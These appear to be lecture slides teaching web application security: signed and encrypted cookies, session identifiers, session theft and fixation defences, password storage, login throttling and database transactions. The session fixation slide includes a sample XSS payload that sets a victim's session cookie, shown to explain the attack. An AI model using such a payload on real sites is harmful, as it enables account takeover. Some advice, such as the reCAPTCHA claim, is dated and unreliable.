Sessions  Stores variables that persist through page views and are specific to a particular user Acts as a simple key-value store (like a hash table) Includes account that user is logged in to  Sessions are temporary, short-term storage May expire or be invalidated at any point in time either by the server or client Generally persist for as long as the user is active and a short period afterwards  All data attached to the session is stored server-side (prevents tampering).  How do we associate the data stored server-side with a single user’s browser? In other words, how do we uniquely identify the user’s browser?

Unique Identification  Option 1: IP Addresses Can be faked via man-in-the-middle, routing nodes ○ No integrity guarantees provided by the Internet. Changes over time (sometimes quickly – cell phone transferring cell towers) Users behind the same router may have the same public IP address  IP Addresses are not a viable choice for identifying a single user.

Stateless Protocols  Recall: HTTP is stateless; the protocol itself remembers nothing about the clients.  However, we still want our applications to have state (we must remember logins, etc.).  Solution: Cookies We send the client a piece of information associated with a key to remember The client sends that same piece of information back on all subsequent requests

Unique Identification  Option 2: Cookies Benefits: ○ Stored locally on client’s machine; don’t change as user moves around ○ Accessible only by the domain that stored them ○ Can be configured to be accessible only over secure HTTPS connections Shortcomings: ○ Remain present on public machines even after user leaves ○ May not be supported or enabled by the client  Cookies are the only reliable option for identifying a user.

What’s wrong with Cookies?  Recall: Cookies are stored completely client-side. This means an attacker can… View their stored cookies Delete cookies Create cookies with any properties Modify existing cookies to have any properties  How can we prevent tampering with cookies? Solution: Hash Functions  It is not possible to prevent deletion, but we can control creation, modification, and sometimes even disclosure of the value.

Cookie Control  To prevent modification, we can use a strong cryptographic hash function as follows: cookie.value = value + hash(secret + value)  When receiving cookies, we can extract the value, provided hash, and check: hash(secret + provided_value) == provided_hash  If the signature is not present or does not match, reject the cookie (act as if it doesn’t exist).

Cookie Control  Why does this work? Since the secret is known only to the server, and cannot be recovered from the hash, an attacker cannot forge a cookie signature. Modifying a cookie will cause the value and hash not to match. The attacker does not know how to modify the hash to make it match.  You should use an HMAC algorithm; HMACs were specifically designed for this purpose (a plain hash(secret + value) built on MD5, SHA-1, or SHA-2 is open to length-extension attacks). Hash-based Message Authentication Code  IMPORTANT: This does not prevent replication (copying) of a cookie. An attacker can still perform man-in-the-middle attacks.
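The signing and checking steps above can be sketched with Python's standard hmac module. This is a minimal sketch, not a definitive implementation: SECRET_KEY, sign_cookie, verify_cookie, and the "value.signature" layout are all assumptions made for illustration.

```python
import hashlib
import hmac

# Hypothetical server-side secret; in practice, load a long random key from configuration.
SECRET_KEY = b"replace-with-a-long-random-server-side-secret"

def sign_cookie(value: str) -> str:
    """Return 'value.signature', where signature is the HMAC-SHA256 of value."""
    sig = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{sig}"

def verify_cookie(cookie: str):
    """Return the original value if the signature matches, otherwise None."""
    value, sep, sig = cookie.rpartition(".")
    if not sep:
        return None  # no signature present: act as if the cookie does not exist
    expected = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    # compare_digest takes time independent of where the inputs differ
    if hmac.compare_digest(sig.encode(), expected.encode()):
        return value
    return None
```

A cookie whose value is changed while the old signature is kept fails verification. A cookie copied as-is still verifies, which is why signing alone does not stop replication.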

Cookie Disclosure  You can prevent users from seeing the values stored in their cookies by encrypting them with a symmetric encryption algorithm (e.g. AES).  When setting: cookie.value = encrypt(value, secret)  When reading: value = decrypt(cookie.value, secret)  IMPORTANT: Encryption by itself DOES NOT guarantee integrity; the user cannot see the plaintext cookie value, but can still modify the ciphertext. You’ll need to use this in combination with some other mechanism (such as HMAC) to verify the authenticity of the cookie’s data.  IMPORTANT: Encrypting the value of a cookie has no effect on an attacker’s ability to perform man-in-the-middle attacks… they can still replicate the cookie.

Session Identifiers  We need to set a cookie containing a session identifier that will be transmitted back to our app on every request.  What makes a good session identifier? It is long. It is random.  How can we protect the session identifier cookie from tampering and theft? Use an HMAC signature Set the HttpOnly flag on the cookie (inaccessible via JavaScript) Set the Secure flag on the cookie (sent only over HTTPS)  Session IDs are password equivalents; you must store them in your database as hashes!
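A minimal sketch of these points, using only the Python standard library. The in-memory sessions dictionary stands in for a database table, and create_session, load_session, and session_cookie_header are hypothetical helper names. An unsalted SHA-256 is used on the assumption that the identifier is already long and random.

```python
import hashlib
import secrets
from http.cookies import SimpleCookie

sessions = {}  # hypothetical stand-in for a database table: sha256(id) -> session data

def create_session(user_id):
    session_id = secrets.token_urlsafe(32)  # 32 random bytes from the OS CSPRNG
    key = hashlib.sha256(session_id.encode()).hexdigest()
    sessions[key] = {"user_id": user_id}
    return session_id  # sent to the browser; only its hash is stored server-side

def load_session(session_id):
    key = hashlib.sha256(session_id.encode()).hexdigest()
    return sessions.get(key)

def session_cookie_header(session_id):
    cookie = SimpleCookie()
    cookie["sessionid"] = session_id
    cookie["sessionid"]["httponly"] = True  # not readable from JavaScript
    cookie["sessionid"]["secure"] = True    # only sent over HTTPS
    return cookie.output()
```

Because only the hash is stored, a leaked sessions table does not directly reveal identifiers that an attacker could place in a cookie.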

Session ID Theft  What happens when an attacker intercepts another user’s cookies (including their session ID)? The attacker can now log in as that user by copying the victim’s cookies into their own browser. The attacker still does not know the user’s password.  How can we prevent theft? Identify users by combination of IP address and session ID? ○ No effect; Internet does not protect against IP address spoofing. ○ If target and attacker are behind the same router, they will have the same public IP (public access points in coffee shops, airports, universities, etc).

Preventing Session ID Theft  How can we prevent theft (continued)? Check for changes to user-agent header? ○ No effect; the attacker can spoof that, too (and if they have access to cookies, they also have access to the user agent header) Encrypting the cookie value? ○ No effect; the hacker doesn’t need to decrypt to use it Using HMAC to prevent cookie modification? ○ No effect; the attacker only needs to copy the cookie not modify it  There is only one way to prevent session ID theft: use HTTPS.

Session Fixation Attacks  Attacker can fixate (set) another user’s session ID using a vulnerability in the session implementation  Potential Attack Scenario: Assume: our server is vulnerable to an XSS attack, session IDs are stored in the “sessionid” cookie. Attacker convinces victim to view a page on our site with the following JavaScript code injected via XSS: ○ document.cookie = "sessionid=ABCDEFG;"; Victim logs into the site using their credentials. Attacker knows user’s session ID (was set via JavaScript code and re-used by server-side session handling code). Attacker can now gain unauthorized access to victim’s account. Verifying the session cookie via HMAC is not a solution to this problem. Why?

Preventing Fixation Attacks  Sessions should have a short lifetime (depending on security requirements of application). After a period of inactivity, they are invalidated.  Session identifiers should be regenerated frequently. For high security applications, they might be good only for the next request. SHOULD occur at regular intervals (e.g. 5 minutes or every request) SHOULD occur when user’s IP address changes MUST occur when switching protocols (between HTTP and HTTPS) MUST occur when user’s privileges escalate or login occurs
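One way to picture regeneration at login and expiry after inactivity is sketched below. The in-memory store, the 15-minute SESSION_LIFETIME, and every function name are assumptions. For brevity the store is keyed by the raw identifier rather than by its hash.

```python
import secrets
import time

SESSION_LIFETIME = 15 * 60  # seconds of allowed inactivity; an assumed value
sessions = {}  # hypothetical in-memory store: session id -> record

def new_session(data=None, now=None):
    sid = secrets.token_urlsafe(32)
    now = time.time() if now is None else now
    sessions[sid] = {"data": dict(data or {}), "last_seen": now}
    return sid

def regenerate(old_sid, now=None):
    """Move any existing data to a fresh identifier and invalidate the old one."""
    record = sessions.pop(old_sid, None)  # identifiers we never issued carry nothing over
    return new_session(record["data"] if record else None, now)

def login(old_sid, user_id, now=None):
    # Regenerate before recording the login, so an identifier planted by an
    # attacker is never the one that becomes authenticated.
    sid = regenerate(old_sid, now)
    sessions[sid]["data"]["user_id"] = user_id
    return sid

def is_active(sid, now=None):
    now = time.time() if now is None else now
    record = sessions.get(sid)
    if record is None or now - record["last_seen"] > SESSION_LIFETIME:
        sessions.pop(sid, None)  # expired or unknown: invalidate
        return False
    return True
```

With this shape, the "ABCDEFG" identifier from the fixation scenario is discarded at login and the attacker is left holding an identifier that maps to nothing.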

Mitigating Damage  How can we mitigate damage if session is compromised? Require the user to enter their password to make any serious changes to their account, before exposing private data, and to verify financial transactions. ○ Attacker does not know the actual password, only the session cookie. Example: user must have entered their current password recently in order to initiate a money transfer or perform an administrator action

Detecting Compromise (GeoIP)  Can retrieve an approximate location of a user given their IP address Longitude and Latitude coordinates Not overly accurate (~99.9% accurate on country level, way less accurate at region level) Can be tricked, but may prevent some attacks  Enables us to detect only significant location changes and act accordingly e.g. user’s session transferring from US to China instantly provides strong indication that they were compromised Employed by both Facebook and Google

Passwords  Passwords stored as salted hashes in database.  Should be case-sensitive.  Support pass phrases (punctuation, symbols).  Enforce complexity constraints upon users. Download database of most commonly used passwords and block their use. Don’t let people choose same password as their username. Enforce a minimum length. Calculate entropy and enforce a threshold.
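A minimal sketch of salted hashing plus a few of the constraints above, using PBKDF2 from the Python standard library. The iteration count, the minimum length, and the three-entry COMMON_PASSWORDS set are placeholder assumptions; a real deployment would load a full list of common passwords and tune the work factor.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumed work factor; tune for your hardware
COMMON_PASSWORDS = {"password", "123456", "qwerty"}  # placeholder for a downloaded list

def hash_password(password, salt=None):
    """Return (salt, digest); a fresh random salt is generated per password."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def check_password(password, salt, digest):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return hmac.compare_digest(candidate, digest)

def acceptable(password, username, min_length=10):
    """Apply the length, common-password, and username checks."""
    lowered = password.lower()
    return (len(password) >= min_length
            and lowered not in COMMON_PASSWORDS
            and lowered != username.lower())
```

The comparison is case-sensitive because the exact bytes of the password feed the hash, and spaces or symbols in a pass phrase need no special handling.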

Password Equivalents  All password equivalents are also stored as hashes. Session IDs Password Reset Codes Persistent Authentication Tokens Secret Answers  All password equivalents must be subject to security measures that are at least as strong as those enforced on passwords. The overall security of the system is reduced to the level of the weakest component.

Secret Questions/Answers  Secret questions weaken the security of the system. Answers are almost always easier to guess than the password itself. Answers can be lifted off of Facebook, blogs, etc. Commonly used questions are ineffective against attackers that actually know the person  Prevalent because they result in fewer customer support calls (saves money for companies)  If you must employ security questions: Use a combination of three or more uncommon questions Require an additional factor before allowing user to enter answers and reset password (email or text them a code)

Login Systems  SHOULD have the facility to alert the user as to failed login attempts and offer to allow them to change their password (if applicable).  SHOULD have the facility to notify the user of their last logged in time, and subsequently report a fraudulent login (and change their password) if they disagree with that date and time.  SHOULD allow logins from multiple machines simultaneously (users don’t want to log back in every time they switch between their laptop and phone)  MAY elect to utilize multi-factor authentication (cell phone, authenticator, email)

Error Messages  Authentication and registration processes (particularly login failures) should provide no information whether the account exists or the entered password was wrong. Use a single error message covering both scenarios. Reduces effectiveness of brute-force attacks.  Error messages in-general should reveal nothing to attackers. Knowledge is power. Errors should still be logged for review later by an administrator.
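A sketch of a login check that returns one message for both failure cases. The users table, the demo password, and the dummy record are hypothetical. Hashing against a dummy record for unknown accounts is an extra assumption, added so that both failures also do similar work.

```python
import hashlib
import hmac
import os

GENERIC_ERROR = "Invalid username or password."

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

_salt = os.urandom(16)
users = {"bob": (_salt, _hash("s3cret passphrase", _salt))}  # hypothetical user table
_DUMMY = (os.urandom(16), os.urandom(32))  # stands in for accounts that do not exist

def login(username, password):
    salt, digest = users.get(username, _DUMMY)
    matches = hmac.compare_digest(_hash(password, salt), digest)
    if matches and username in users:
        return "ok"
    # Same message whether the account is missing or the password is wrong;
    # the real reason would be written to a server-side log instead.
    return GENERIC_ERROR
```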

Persistent Authentication  Sessions are temporary… might wish to preserve a user’s login beyond the current session.  Effect is achieved using a second cookie containing a persistent authentication token which is good for a single use.  Example: User logs into application using the “Remember Me” option. “Remember Me” option sets a persistent login token as a cookie, and marks the user’s session to indicate the account logged in to. User stops using application causing their session to time out. On next visit, user is automatically logged in to a new session using the persistent login token (rather than a traditional username/password form). The token is consumed (invalidated) and a brand new token is issued and set as a cookie.

Persistent Auth Tokens  A token is good for a single use; invalidated after use and a new one is issued.  Current token is invalidated when user logs out through any deliberate logout function.  User has the option to purge all persistent tokens for their account.  Periodically, the system purges unused tokens older than a certain age.  Used by almost every website you can think of
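The single-use behaviour can be sketched as follows. The tokens dictionary stands in for a database table and the function names are hypothetical. Tokens are stored as hashes because they are password equivalents.

```python
import hashlib
import secrets

tokens = {}  # hypothetical table: sha256(token) -> user id

def _digest(token):
    return hashlib.sha256(token.encode()).hexdigest()

def issue_token(user_id):
    token = secrets.token_urlsafe(32)
    tokens[_digest(token)] = user_id
    return token  # set as the "remember me" cookie

def redeem_token(token):
    """Consume a token; return (user_id, replacement_token) or None."""
    user_id = tokens.pop(_digest(token), None)  # pop makes the token single-use
    if user_id is None:
        return None
    return user_id, issue_token(user_id)

def purge_tokens(user_id):
    """Invalidate every persistent token belonging to one account."""
    for key in [k for k, owner in tokens.items() if owner == user_id]:
        del tokens[key]
```

Logging out would delete the current token the same way redeem_token does, without issuing a replacement.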

Persistent Auth Security  Access to vital user functions should always require re-entry of the user’s password  User should not be able to perform the following functions after performing a cookie-based login from a persistent token without re-entering his password: Change password Change email Modify account settings Initiate financial transactions
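A small sketch of such a gate, assuming the session records when the password was last typed. The password_verified_at key and the five-minute REAUTH_WINDOW are illustrative assumptions.

```python
import time

REAUTH_WINDOW = 5 * 60  # seconds a password entry stays "recent"; an assumed value

def may_perform_sensitive_action(session, now=None):
    """Allow the action only if the password was entered recently in this session."""
    now = time.time() if now is None else now
    verified_at = session.get("password_verified_at")
    return verified_at is not None and now - verified_at <= REAUTH_WINDOW

# A login from a persistent token never sets password_verified_at,
# so it cannot change the password or email, or move money.
token_session = {"user_id": "bob"}
password_session = {"user_id": "bob", "password_verified_at": 1_000}
```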

Brute-Force Attacks and Spam  Brute-Force Attacks: attacker attempts to perform an action that requires validation over and over again using random guesses, hoping that eventually one of their guesses will be right Example: attempting to guess a user’s password Usually done by a program… thousands of guesses per second  Spam: forms in your application filled out and submitted repeatedly by computer programs  Spam and Brute-Force Attacks are prevented in the exact same ways

CAPTCHAs  Images generated by a server-side program containing randomly generated numbers, letters, and symbols  In order to perform action, user must correctly copy content into a text field  Attempt to ensure that forms are submitted only by humans, not robots or automated tools Difficult for computer programs to correctly recognize symbols  Not always user-friendly or human solvable… still ineffective against low-cost human solving services ($12/500 tests)  Always use Google’s reCAPTCHA implementation, which is OCR-hard by design (it uses book scans that OCR software already misclassified) and is very user-friendly

Throttling  It takes virtually no time to crack an intricate, symbols-and-letters, upper-and-lowercase password, if it is less than 8 characters long.  It would, however, take an inordinate amount of time to crack even a 6-character password if you were limited to one attempt per second!  Throttling is the practice of limiting the rate at which users can make requests that modify information on the server. Can also be used to limit rate at which users can attempt to log in
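The arithmetic behind this claim can be checked directly. The 95-character alphabet (printable ASCII) and the unthrottled rate of one billion guesses per second are assumptions chosen for illustration, not measurements.

```python
ALPHABET_SIZE = 95                # printable ASCII characters; an assumption
OFFLINE_RATE = 1_000_000_000      # assumed guesses per second with no throttling
SECONDS_PER_YEAR = 365 * 24 * 3600

def worst_case_seconds(length, guesses_per_second):
    """Time needed to try every password of exactly this length."""
    return ALPHABET_SIZE ** length / guesses_per_second

unthrottled_minutes = worst_case_seconds(6, OFFLINE_RATE) / 60
throttled_years = worst_case_seconds(6, 1) / SECONDS_PER_YEAR
print(f"{unthrottled_minutes:.0f} minutes unthrottled, "
      f"{throttled_years:,.0f} years at one guess per second")
```

Under these assumptions the 95^6 (about 7.35 × 10^11) six-character passwords fall in roughly 12 minutes unthrottled, but take about 23,000 years at one attempt per second.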

Throttling  Failed authentication attempt throttling should be keyed off of both the client’s IP address and the victim account.  Necessary to key off of account due to distributed brute-force attacks  Use an increasing delay for each attempt with an upper bound.  In seconds: 0 0 0 2 4 8 16 30 60 60 60….  Cookie-based logins via persistent tokens should be throttled, too.  Separate throttling counter for persistent logins  Prevents users from trying to brute-force guess persistent tokens
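The delay schedule and the two throttling keys can be sketched as a lookup table plus two counters. The in-memory failures dictionary and the function names are hypothetical; a persistent-token login would use the same logic with its own separate counters.

```python
from collections import defaultdict

# Seconds to wait before each successive attempt, taken from the schedule above.
DELAYS = [0, 0, 0, 2, 4, 8, 16, 30, 60]

failures = defaultdict(int)  # hypothetical store: ("ip", addr) or ("account", name) -> count

def delay_for(failed_attempts):
    """Delay before the next attempt, capped at the last entry (60 seconds)."""
    return DELAYS[min(failed_attempts, len(DELAYS) - 1)]

def required_delay(ip, account):
    # Take whichever key is throttled harder, so rotating IP addresses
    # does not reset the delay on the targeted account.
    return max(delay_for(failures[("ip", ip)]),
               delay_for(failures[("account", account)]))

def record_failure(ip, account):
    failures[("ip", ip)] += 1
    failures[("account", account)] += 1
```

Five failures against one account from five different addresses leave each address at zero delay, yet the account key alone already forces an 8-second wait.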

Throttling (Denial of Service)  Attacker may try to lock legitimate user out of their account using the throttling system  Option 1: Email or text throttling bypass code to user Code is active only for limited period of time and limited attempts Each account only eligible to receive a code every 12 hours  Option 2: Allow users to bypass throttling by solving a CAPTCHA Throttling should also be imposed on CAPTCHA-based login attempts, but in a separate pool

Database Concurrency  We are operating a banking web application.  Let’s say that Bob makes a deposit into his account. 1) $oldBalance = SELECT `balance` FROM `accounts` WHERE `acc` = '1' LIMIT 1; 2) $newBalance = $oldBalance + $amountDeposited; 3) UPDATE `accounts` SET `balance` = $newBalance WHERE `acc` = '1';  What happens if Bob’s wife tries to make a deposit at the same time? 4) $oldBalance = SELECT `balance` FROM `accounts` WHERE `acc` = '1' LIMIT 1; 5) $newBalance = $oldBalance + $amountDeposited2; 6) UPDATE `accounts` SET `balance` = $newBalance WHERE `acc` = '1';  The database system may choose to execute concurrent queries in any order; the only constraints are that 1 comes before 3 and 4 before 6. What happens if the system chooses 1, 4, 3, 6?
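The 1, 4, 3, 6 ordering can be replayed by hand. The sketch below uses a plain variable in place of the `balance` column; the starting balance and the deposit amounts are made-up values.

```python
def interleaved_deposits(start, deposit_bob, deposit_wife):
    """Replay steps 1, 4, 3, 6 against a single balance value."""
    balance = start
    old_bob = balance                    # step 1: Bob's request reads the balance
    old_wife = balance                   # step 4: his wife's request reads the same balance
    balance = old_bob + deposit_bob      # step 3: Bob's request writes its result
    balance = old_wife + deposit_wife    # step 6: overwrites step 3 using the stale read
    return balance

print(interleaved_deposits(100, 50, 25))  # 125, although the deposits should total 175
```

Bob's deposit is silently lost: the second write is computed from a balance that was read before the first write happened.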

Database Concurrency  We could fix the example in the previous slide by making the query for both deposits be: UPDATE `accounts` SET `balance` = `balance` + $amountDeposited WHERE `acc` = '1';  At first glance, you may think that this still results in a data race. However, concurrency controls within the database system guarantee that the end result of two queries (Q1, Q2) executed in parallel must be either Q1; Q2; or Q2; Q1;  Why did this not help us on the previous slide?

Database Concurrency  What if we absolutely must execute a sequence of queries in order to update something and we want to be sure no concurrent queries altered the database while intermediate calculations were held in memory? Example: Bob and his wife making deposits at the same time where each deposit requires two queries (a read and a write).  What if we need to execute a group of queries and we must be absolutely certain that every single query within the group succeeds? Example: Transfer money from one bank account to another

Transactions (IMPORTANT)  In order for your application to be secure, you must ensure that its data remains in a safe, consistent state at all times.  Consider a banking website that allows its users to transfer money between one another online. 1. UPDATE `accounts` SET `balance` = `balance` - :amount WHERE `user` = 'bob'; 2. UPDATE `accounts` SET `balance` = `balance` + :amount WHERE `user` = 'alice';  What happens if the server crashes after (1) is executed?  What happens if (1) fails but (2) succeeds?

Transactions (continued)  A transaction is a set of operations to a database that are treated as a unit. End behavior of two transactions T1, T2 executed in parallel is either T1; T2 or T2; T1  A transaction… runs in isolation. enforces the constraint that all of its operations must succeed. If any operation fails, the database is reverted to the state it was in when the transaction began.  Transactions can happen concurrently, provide system failure recovery, and ensure the database is always in a consistent state.

Transactions  If the system crashes (or the client loses its connection) during a transaction, then the database is rolled back to the state it was in before the transaction started. The user might have to re-try an action, but the database state remains consistent.  By default, every statement you enter is treated as a transaction consisting of a single query. To disable this, SET `autocommit` = 0; If you disable this, you will need to manually COMMIT; your queries.

Transactions Example
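The original example for this slide did not survive in the transcript. As a stand-in, here is a minimal sketch of the Bob-to-Alice transfer as a single transaction, using Python's built-in sqlite3 module rather than whatever database and language the lecture used. The table layout, the starting balances, and the transfer function are assumptions.

```python
import sqlite3

def transfer(conn, sender, recipient, amount):
    """Move amount between two accounts atomically; undo everything on failure."""
    try:
        with conn:  # commits if the block succeeds, rolls back if it raises
            cur = conn.execute(
                "UPDATE accounts SET balance = balance - ? "
                "WHERE user = ? AND balance >= ?",
                (amount, sender, amount))
            if cur.rowcount != 1:
                raise ValueError("sender missing or insufficient funds")
            cur = conn.execute(
                "UPDATE accounts SET balance = balance + ? WHERE user = ?",
                (amount, recipient))
            if cur.rowcount != 1:
                raise ValueError("recipient missing")
        return True
    except ValueError:
        return False

# Hypothetical demo data in an in-memory database.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (user TEXT PRIMARY KEY, balance INTEGER NOT NULL)")
conn.executemany("INSERT INTO accounts VALUES (?, ?)", [("bob", 100), ("alice", 50)])
conn.commit()
```

If the second UPDATE fails, for example because the recipient does not exist, the debit from the first UPDATE is rolled back with it, so money is never removed from one account without arriving in the other.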
